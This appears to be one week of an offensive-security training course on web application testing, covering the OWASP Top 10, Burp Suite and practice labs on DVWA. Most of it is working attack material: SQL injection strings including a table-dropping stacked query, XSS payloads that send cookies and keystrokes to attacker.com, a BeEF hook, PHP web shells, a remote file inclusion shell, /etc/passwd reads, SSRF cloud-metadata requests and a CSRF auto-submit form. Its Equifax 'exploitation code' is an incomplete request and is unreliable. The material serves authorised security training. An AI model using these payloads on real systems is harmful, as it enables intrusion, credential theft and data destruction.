Week 6: Web Application Testing
MITRE ATT&CK: Tactic — TA0011 (Initial Access), Technique — T1190 (Exploit Public-Facing Application)
Real-World Attack Scenario: The 2017 Equifax Data Breach (Web Application Attack)
The 2017 Equifax breach affected 147 million people. The attack chain started with a web application vulnerability:
- Vulnerability: CVE-2017-5638 in Apache Struts 2 (Jakarta Multipart parser)
- Attack Vector: Malformed Content-Type header in HTTP request
- Exploitation Code:
GET / HTTP/1.1 Host: portal.equifax.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary # When Struts parsed this incorrectly, command injection occurred - Initial Shell: Attackers gained command execution as the web server user
- Discovery: Found plaintext credentials in configuration files
- Lateral Movement: Used stolen DB credentials to access customer data databases
- Exfiltration: Exported 147 million records via CSV files
Why this week matters: 83% of breaches involve web application vulnerabilities (Verizon DBIR). Every week, new CVEs in WordPress, Drupal, Apache Struts, and other web frameworks are actively exploited. Understanding OWASP Top 10 isn't optional — it's essential survival.
Objectives
- Master OWASP Top 10 vulnerabilities
- Become proficient with Burp Suite
- Identify and exploit common web vulnerabilities
- Understand web attack chains and chaining techniques
OWASP Top 10 (2021)
1. Broken Access Control - IDOR, privilege escalation, path traversal
2. Cryptographic Failures - Sensitive data exposure, weak crypto
3. Injection - SQL, NoSQL, OS, LDAP, XSS, Command
4. Insecure Design - Business logic flaws, missing rate limits
5. Security Misconfiguration - Default creds, verbose errors, misconfigs
6. Vulnerable Components - Outdated libraries, unpatched deps
7. Authentication Failures - Brute force, session hijacking, weak passwords
8. Software Integrity - CI/CD injection, unsigned updates
9. Logging Failures - No audit trail, missing forensics
10. SSRF - Server-side request forgeryBurp Suite Fundamentals
Setup
bash
# Kali Linux includes Burp Suite
burpsuite
# Or community edition
burpsuite --collaborator
# Configure proxy
# Firefox: Preferences → Network Settings → Manual proxy → 127.0.0.1:8080
# Enable interception
# CA certificate: Proxy → Options → Import/export CA certificateKey Features
| Tab | Use |
|---|---|
| Proxy → Intercept | Capture/modify requests |
| Proxy → HTTP History | All requests/responses |
| Target → Site Map | Discovered endpoints |
| Intruder | Fuzzing, parameter enumeration |
| Repeater | Manual request manipulation |
| Decoder | Encode/decode, hash |
| Comparer | Diff two responses |
| Sequencer | Entropy analysis |
| Extender | BApp store, custom |
Proxy Operations
bash
# Intercept toggle: Intercept is on/off
# Forward: Send request to server
# Drop: Discard request
# Action: Send to other toolsSite Map & Scope
# Set scope
# Target → Scope → Add include pattern: ^https?://10\.0\.0\.5.*
# Right-click → Add to scope
# Spider
# Right-click host → Spider this host
# Crawls forms, links, parametersIntruder (Fuzzer)
bash
# Attack types
Sniper - Single payload set, one position
Battering Ram - Single payload set, all positions
Pitchfork - Multiple payload sets, position-matched
Cluster Bomb - Multiple payload sets, all combinations
# Positions (§ §)
GET /api/user?id=§123§ HTTP/1.1
# Payloads
Simple list - Load wordlist
Runtime file - Read from file
Numbers - Sequence or range
Dates - Date patterns
Brute forcer - Character set + length
# Grep
Add grep match: "username"
Add grep extract: Extract session token from responseSQL Injection
Theory
sql
-- In PHP: "SELECT * FROM users WHERE id = " + user_id
-- Attacker enters: 1 OR 1=1
-- Result: SELECT * FROM users WHERE id = 1 OR 1=1
-- Union injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT table_name FROM information_schema.tables--
-- Boolean blind
' OR 1=1--
' AND 1=2-- (false, observe different response)
-- Time-based blind
' OR SLEEP(5)--
' OR IF(1=1,SLEEP(3),0)--
-- Stacked queries (if ; supported)
'; DROP TABLE users;--
'; SELECT * FROM users;--Detection Checklist
1. Try: ' (single quote)
2. Try: " (double quote)
3. Try: \ (backslash)
4. Try: -- (comment)
5. Try: /* (block comment)
6. Try: OR 1=1
7. Try: AND 1=2
8. Check for different responses (error vs normal)SQLMap (Automated)
bash
# Basic usage
sqlmap -u "http://10.0.0.5/page.php?id=1"
# With POST data
sqlmap -u "http://10.0.0.5/login.php" --data="user=admin&pass=secret"
# With cookies
sqlmap -u "http://10.0.0.5/page.php?id=1" --cookie="PHPSESSID=abc123"
# Database enumeration
sqlmap -u "http://10.0.0.5/page.php?id=1" --dbs
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name --tables
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name -T users --columns
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name -T users -C username,password --dump
# Level/Risk
sqlmap -u "http://10.0.0.5/page.php?id=1" --level=5 --risk=3
# OS shell
sqlmap -u "http://10.0.0.5/page.php?id=1" --os-shell
sqlmap -u "http://10.0.0.5/page.php?id=1" --os-pwn # Meterpreter
# Crawl
sqlmap -u "http://10.0.0.5" --crawl=2 --batchSQL Injection Examples
Authentication Bypass
sql
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1 #
' OR 1=1/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1' #
' OR '1'='1'/*
' OR 1=1 LIMIT 1--UNION-based Extract Data
sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- (find correct column count)
' UNION SELECT version(),user(),database()--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password,NULL FROM users--Cross-Site Scripting (XSS)
Types
Reflected: JS in URL param, reflected in response (phishing delivery)
Stored: JS saved in DB, served to all users (most dangerous)
DOM-based: JS executes via client-side modification of DOMPayloads
javascript
<script>alert(document.domain)</script>
<img src=x onerror="alert(1)">
<svg onload="alert(1)">
<iframe src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>
<div onclick="alert('XSS')">click
<body onload="alert('XSS')">
// Cookie theft
<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>
// Keylogger
<script>document.onkeypress=function(e){fetch('http://attacker.com/log?k='+e.key)}</script>
// Screen capture (requires user interaction)
<script>
navigator.mediaDevices.getUserMedia({video:true}).then(stream=>{
// Send stream to attacker
});
</script>Finding XSS
bash
# Manual
'"><script>alert(1)</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Burp Intruder wordlist
# /usr/share/wordlists/wfuzz/XSS.*
# /usr/share/wordlists/payloads/xss*
# Automated
xsser -u "http://10.0.0.5/page?param=test"
# or use Nuclei templatesBeEF (Browser Exploitation Framework)
bash
# Start
beef-xss
# Hook URL: http://127.0.0.1:3000/hook.js
# Inject: <script src="http://ATTACKER/hook.js"></script>
# In BeEF panel:
# Commands → Browser → Get Cookie
# Commands → Browser → Redirect
# Commands → Social Engineering → Fake Flash UpdateCommand Injection
Detection
bash
# Try these in a parameter that might execute commands
; whoami
| whoami
& whoami
&& whoami
|| whoami
; whoami;
$(whoami)
`whoami`Filter Bypass
bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
# Encoding
echo%20"test"
echo"test"
# Chaining
;ls
|ls
&ls
\nls
# PHP functions
<?php echo system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>Path Traversal / Local File Inclusion (LFI)
Path Traversal
bash
# Basic
../../etc/passwd
....//....//....//etc/passwd
# Null byte (old PHP)
../../etc/passwd%00
# Double encoding
..%252f..%252f..%252fetc/passwd
# Linux files
/etc/passwd
/etc/hosts
/proc/self/environ
/proc/net/tcp
/proc/[pid]/cmdline
# Windows
C:\Windows\System32\drivers/etc/hosts
C:\Windows\win.iniLFI → RCE
bash
# Log poisoning
# Inject PHP into Apache access log
curl "http://10.0.0.5" -A "<?php system(\$_GET['cmd']); ?>"
# Then access log via LFI
http://10.0.0.5/index.php?page=../../var/log/apache2/access.log&cmd=whoami
# PHP session files
# Usually /var/lib/php/sessions/sess_[PHPSESSID]
# Write shell via registration form or login
# /proc/self/fd/ - read file descriptorsRemote File Inclusion (RFI)
bash
# If allow_url_include enabled
http://10.0.0.5/index.php?page=http://attacker.com/shell.txt
# shell.txt contains <?php system($_GET['cmd']); ?>SSRF (Server-Side Request Forgery)
Detection
bash
# Test for SSRF in URL parameters
# Point to internal services
http://localhost/
http://127.0.0.1:80/
http://169.254.169.254/ # AWS metadata
http://metadata.google.internal/ # GCP metadata
http://169.254.169.254/latest/user-data/ # AWS user dataExploitation
bash
# Port scan internal network
http://10.0.0.5/?url=http://10.0.0.5:22
http://10.0.0.5/?url=http://10.0.0.5:3306
# Read local files
http://10.0.0.5/?url=file:///etc/passwd
http://10.0.0.5/?url=file:///var/www/html/config.php
# AWS metadata
http://10.0.0.5/?url=http://169.254.169.254/latest/meta-data/
http://10.0.0.5/?url=http://169.254.169.254/latest/user-data/
# Internal web admin
http://10.0.0.5/?url=http://localhost:8080/adminBusiness Logic Vulnerabilities
IDOR (Insecure Direct Object Reference)
bash
# Find numeric IDs in URLs
http://site.com/account?id=123
# Manipulate
http://site.com/account?id=124
http://site.com/account?id=1
# In JSON bodies
{"user_id": 123} → {"user_id": 124}
# Tools
# Authz (Burp extension) - automated IDOR detectionRace Conditions
bash
# Gift card reuse
# Transfer funds double-spend
# Coupon code reuse
# Attack with multiple concurrent requests
# Use Burp Intruder with multiple threadsCSRF (Cross-Site Request Forgery)
Detection
bash
# Check if CSRF token exists
# Check if token is validated server-side
# Without token - likely vulnerable
# With token - verify it's actually checkedExploitation
html
<html>
<body>
<form action="http://10.0.0.5/changepassword" method="POST">
<input type="hidden" name="password" value="hacked" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Practice Labs
Lab 1: DVWA (Damn Vulnerable Web App)
bash
# On Kali or Metasploitable
# DVWA at http://10.0.0.5/dvwa
# Set security level: low, medium, high
# Test: SQLi, XSS, CSRF, IDOR, LFILab 2: SQL Injection
bash
# Use Burp Suite to intercept login
# Try SQL injection bypasses
admin' --
# Check response
# Use SQLMap
sqlmap -u "http://10.0.0.5/sqli.php?id=1" --batch --dbsLab 3: XSS with BeEF
bash
# Find reflected XSS in DVWA
# Inject BeEF hook
<script src="http://KALI_IP:3000/hook.js"></script>
# Open BeEF panel, explore victim browserKey Takeaways
- Burp Suite — master Proxy, Repeater, Intruder, Decoder
- SQL injection — understand UNION, boolean blind, time-based blind
- XSS — reflected, stored, DOM-based; steal cookies, keylog
- LFI/RFI — read files, poison logs, gain shell
- SSRF — port scan internal, fetch metadata, read files
- Chain vulnerabilities — often need multiple vulns for full pwn
Next Week Preview
Week 7 covers Network Penetration Testing — SMB, FTP, SSH, RDP attacks, relay techniques, and lateral movement in Windows/Active Directory environments.